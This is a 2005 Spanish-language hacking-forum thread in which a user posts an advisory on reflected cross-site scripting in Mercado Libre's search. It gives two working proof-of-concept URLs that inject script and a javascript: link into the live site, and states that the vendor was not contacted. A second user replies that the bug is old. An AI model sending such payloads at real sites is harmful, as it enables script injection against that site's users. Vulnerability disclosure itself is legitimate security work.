elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 22:44  


Tema destacado: [Overclocking] Récords de overclock del foro

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  XSS en Mercado Libre
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS en Mercado Libre  (Leído 1,306 veces)
int21h

Desconectado Desconectado

Mensajes: 4


Ver Perfil
XSS en Mercado Libre
« en: 12 Marzo 2005, 13:52 »

Security .Net Information Advisore:

Mercado Libre Vulnerabilities:
Cross-Site Scripting
Cross-Agent Script
Input Validation Error

Search in mercadolibre (all countries) permits cross site scripting Attacks (search?as_display_type=G&as_word=CODE).
A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser

Live demo:


http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Ca%20href=javascript:alert('snilabs-greetz:arielutn@gmail.com')%3E%3Cimg%20src=http://www.geocities.com/promospeedy/infobugs/logo1.jpg%3E%3C/a%3E

http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Cscript%3Ealert('snilabs%20-%20%20greetz:%20arielutn@gmail.com')%3C/script%3E



Vendor Contacted: not yet.. lol :)
Vuln Greetz, Credits and Discovery: Ariel (arielutn@gmail.com)
Snilabs greetz: A|iazar, Dar, El_Aventurero, Cyrus, GuS, Farynrl, mmm is much.. so nothing more :P
En línea
oRTNZ


Desconectado Desconectado

Mensajes: 808


no no soy malo... soy vicioso :p


Ver Perfil
Re: XSS en Mercado Libre
« Respuesta #1 en: 13 Marzo 2005, 13:04 »

ese bugcito ya era viejito,creo que nadie se intereso por el  :P,saludos
En línea

(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines